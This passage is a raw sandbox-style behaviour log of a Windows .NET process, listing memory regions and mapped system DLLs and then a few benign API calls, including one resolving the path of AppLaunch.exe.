1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000fffb0000" filename = "" Region: id = 3559 start_va = 0xfffe0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffe0000" filename = "" Region: id = 3560 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3561 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 3570 start_va = 0x1d0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3571 start_va = 0x320000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3572 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3573 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3574 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3575 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3581 start_va = 0x600000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3582 start_va = 0x6d360000 end_va = 0x6d3b8fff monitored = 1 entry_point = 0x6d370780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 3583 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3584 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3585 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3586 start_va = 0xffeb0000 end_va = 0xfffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000ffeb0000" filename = "" Region: id = 3587 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3588 start_va = 0x200000 end_va = 0x2bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3589 start_va = 0x7fff0000 end_va = 0x7fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3590 start_va = 0x80000000 end_va = 0x8000ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000080000000" filename = "" Region: id = 3591 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3592 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3593 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3594 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3595 start_va = 0x2c0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3596 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 3597 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3598 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3599 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3600 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3601 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3602 start_va = 0x8d0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 3616 start_va = 0x6d290000 end_va = 0x6d308fff monitored = 1 entry_point = 0x6d29f82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 3618 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3619 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3620 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3621 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3622 start_va = 0x370000 end_va = 0x399fff monitored = 0 entry_point = 0x375680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3623 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 3624 start_va = 0xab0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 3625 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3628 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3629 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 3630 start_va = 0xac0000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 3631 start_va = 0xc50000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 3632 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3633 start_va = 0x6d3d0000 end_va = 0x6d3d7fff monitored = 0 entry_point = 0x6d3d17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3634 start_va = 0x6bf00000 end_va = 0x6c5b0fff monitored = 1 entry_point = 0x6bf15d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 3635 start_va = 0x6d190000 end_va = 0x6d284fff monitored = 0 entry_point = 0x6d1e4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 3638 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 3639 start_va = 0x340000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 3640 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 3641 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 3642 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3643 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 3644 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 3645 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3646 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3647 start_va = 0x2050000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 3649 start_va = 0x600000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3650 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 3651 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3652 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 3653 start_va = 0x2050000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 3654 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 3659 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 3660 start_va = 0x21d0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 3661 start_va = 0x41d0000 end_va = 0x426ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 3662 start_va = 0x660000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 3663 start_va = 0x4270000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 3678 start_va = 0x4370000 end_va = 0x46a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3679 start_va = 0x6acd0000 end_va = 0x6bef7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 3681 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3682 start_va = 0x46b0000 end_va = 0x4740fff monitored = 0 entry_point = 0x46e8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3683 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3684 start_va = 0x46b0000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 3686 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 3687 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3688 start_va = 0x6d110000 end_va = 0x6d18dfff monitored = 1 entry_point = 0x6d111140 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 3689 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3690 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3691 start_va = 0x6a320000 end_va = 0x6accbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 3692 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3693 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3694 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3695 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3696 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3697 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3698 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 3699 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3700 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3701 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3702 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3703 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3704 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3705 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3706 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3707 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3708 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3709 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3710 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3711 start_va = 0x6a0000 end_va = 0x6a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3713 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3714 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3715 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3716 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3717 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3718 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3719 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3720 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3721 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3722 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3723 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3724 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3725 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3726 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3727 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3728 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3729 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3730 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3731 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3732 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3733 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3734 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3735 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3736 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3737 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3738 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3739 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3740 start_va = 0x4790000 end_va = 0x494ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 3741 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3742 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3743 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3744 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Thread: id = 139 os_tid = 0x594 [0319.100] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0319.313] RoInitialize () returned 0x1 [0319.313] RoUninitialize () returned 0x0 [0321.566] EtwEventRegister (in: ProviderId=0x21d8e6c, EnableCallback=0x49405be, CallbackContext=0x0, RegHandle=0x21d8e48 | out: RegHandle=0x21d8e48) returned 0x0 [0321.570] EtwEventSetInformation (RegHandle=0x6e0720, InformationClass=0x1c, EventInformation=0x2, InformationLength=0x21d8dfc) returned 0x0 [0321.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x19d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b Thread: id = 141 os_tid = 0xe5c Thread: id = 142 os_tid = 0xdb4 Thread: id = 143 os_tid = 0xbc0 [0319.314] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0319.314] RoInitialize () returned 0x1 [0319.314] RoUninitialize () returned 0x0